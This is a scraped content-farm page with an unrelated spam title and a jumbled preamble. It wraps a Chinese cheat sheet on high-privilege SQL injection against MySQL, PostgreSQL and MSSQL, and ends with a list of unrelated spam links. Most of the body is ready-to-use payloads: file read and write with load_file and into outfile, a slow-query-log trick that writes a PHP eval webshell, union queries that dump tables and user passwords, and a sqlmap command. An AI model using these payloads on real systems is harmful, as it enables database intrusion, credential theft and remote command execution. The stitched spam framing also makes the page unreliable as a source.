当前位置: 首页 > news >正文

python语言基础seo短视频网页入口营销策略

python语言基础,seo短视频网页入口营销策略,在ppt里面做网站链接,做个网站多少钱啊文章目录 Mysql-root高权限读写注入PostgreSQL——dba高权限读写注入Mssql-sa高权限读写注入 Access无高权限注入点——只能猜解#xff0c;而且是暴力猜解#xff1b; MYSQL#xff0c;PostgreSQL#xff0c;MSSQL(SQL server)高权限注入点——可升级读写#xff08;文件… 文章目录 Mysql-root高权限读写注入PostgreSQL——dba高权限读写注入Mssql-sa高权限读写注入 Access无高权限注入点——只能猜解而且是暴力猜解 MYSQLPostgreSQLMSSQL(SQL server)高权限注入点——可升级读写文件、命令执行等。 所谓高权限注入点指的就是在连接数据库时所使用的用户数据库连接用户具有较高的权限。因为权限划分的缘故。如果存在高权限注入点所做的不仅仅是查看数据库的内容还可以是文件上传、命令执行。 Mysql-root高权限读写注入 读文件命令行 数据库可以调用自身的函数load_file(file_path)读取服务器上的文件。payloadselect load_file(file_path) 写文件命令行 有关函数outfile()、dumpfile()。paylaodselect file_content into outfile file_path 读文件union select 1,load_file(d:/w.txt),3 -- 在实战中一般读取数据库配置文件、网站搭建性文件。具体读哪些文件可以参考load_file 常用路径 获取网站路径方式1读取中间件的配置文件例如phpstudy的vhosts.conf文件 获取网站路径方式2phpinfo() 获取网站路径方式3报错 写文件union select 1,xxx,3 into outfile d:/www.txt -- 会出现有高权限注入点但是无法读取写入文件的情况——secure-file-priv参数 secure-file-priv参数有三种情况 secure-file-privnull不允许读写secure-file-priv/tmp/读写只能发生在tmp目录下secure-file-priv 读写不做限制。 突破方法 注入点需要支持SQL执行环境若没有就需要借助phpmyadmin或能够直接连上那个对方数据库进行绕过。payload:set global slow_query_log1; //启用慢日志 set global slow_query_log_fileshell网站路径; //保存慢日志的路径便于用浏览器可以进行访问 select ?php eval($_GET[cmd]);? or sleep(11);支持堆叠注入 PostgreSQL——dba高权限读写注入 # 测列数 order by 4# 测回显位 and 12 union select null,null,null //没报就没有换下一个 and 12 union select null,null,null //爆出null# 获取信息 and 12 union select null,version(),null // 获取当前数据库版本 and 12 union select null,current_user,null //获取当前用户 and 12 union select null,current_database(),null //获取当前数据库名# 获取所有数据库名 and 12 union select null,string_agg(datname,,),null from pg_database# 获取表名 1. and 12 union select null,string_agg(tablename,,),null from pg_tables where schemanamepublic 2. and 12 union select null,string_agg(relname,,),null from pg_stat_user_tables# 获取字段名 and 12 union select null,string_agg(column_name,,),null from information_schema.columns where table_namereg_users# 读取数据 and 12 union select null,string_agg(name,,),string_agg(password,,),null from reg_users----- # 获取DBA用户PostgreSQL中的root用户 and 12 union select null,string_agg(username,,),null from pg_user where usesuper is true参考postgresql注入 Mssql-sa高权限读写注入 # 测字段数 order by 4# 测回显位 and 12 union all select null,null,null //用单引号包裹null若该位置存在回显位则页面爆出null# 获取信息 version //获取版本信息 db_name() //当前数据库名字 user,system_user,current_user,user_name //获取当前用户名,四种查询方式 SERVERNAME //获取服务器主机信息 and 12 union all select null,db_name(),null# 查表名 and 12 union all select null,(select top 1 name from 数据库名.dbo.sysobjects where xtypeu),null and 12 union all select null,(select top 1 name from 数据库名.dbo.sysobjects where xtypeu and name not in (manage(第一个表名))),null //查其他表# 查字段名 and 12 union all select null,(select top 1 col_name(object_id(manage),1) from sysobjects),null and 12 union all select null,(select top 1 col_name(object_id(manage),2) from sysobjects),null# 查字段内容 and 12 union all select null,username,null from manage使用sqlmap时一般直接用sqlmap发数据包。讲数据包保存在txt文件中在参数后面加*告诉sqlmap你要在这进行注入。 payloadpython sqlmap.py -r 1.txt sql使用手册
http://www.zqtcl.cn/news/400448/

相关文章:

  • 绍兴市交通建设有限公司网站陕西建设分行网站
  • 如何套用别人网站做页面自己创建app
  • 建国内外网站有什么区别永久免费视频会议服务器
  • 个人网站备案成功后怎么做网站开发要学哪些知识
  • 论文写作数据网站餐饮招商
  • 嘉祥网站建设公司小企业网站建设多少钱
  • 做设计.不抠图网站114在线查询电话
  • 上饶网站制作需要多少钱网站百度地图标注
  • 微信网站二次开发广州番禺人才网
  • 支部网站及活动室建设免费建设网站有哪些
  • 深圳福田专业网站推广互联网网站开发有哪些职位
  • 手机网站生成西安北郊做网站
  • 深圳宝安区网站建设南通建设厅网站
  • 介绍做网站的标题在线图片编辑器好用吗
  • 金华建设网站公司笔记本销售网站开发的背景
  • 国外做的好看的网站设计网络营销推广方案怎么做
  • 网站建站业务wordpress网站域名地址
  • 烟台网站制作这做菠菜网站
  • 网站建设vr百度站长
  • 织梦网站广告代码如何写网页设计你若安好便是晴天作业
  • 网站建设 上海wordpress 知更鸟 公告
  • 建小说网站需要多少钱罗湖区住房和建设网站
  • 湖南专业网站建设服务做网站的底图尺寸多大
  • 山东省住房与建设厅网站首页有名的wordpress主题商
  • 常州市金坛区网站建设毕业设计代做淘宝好还是网站好
  • 品牌网站建设营销型网站设计网站整合方案
  • 网站开发设计师网站代理什么意思
  • 网站层级关系邯郸品牌商标vi设计策划公司
  • 网站开发产品需求说明小网站代码
  • 苏州网站推广排名网站建设方案范文8篇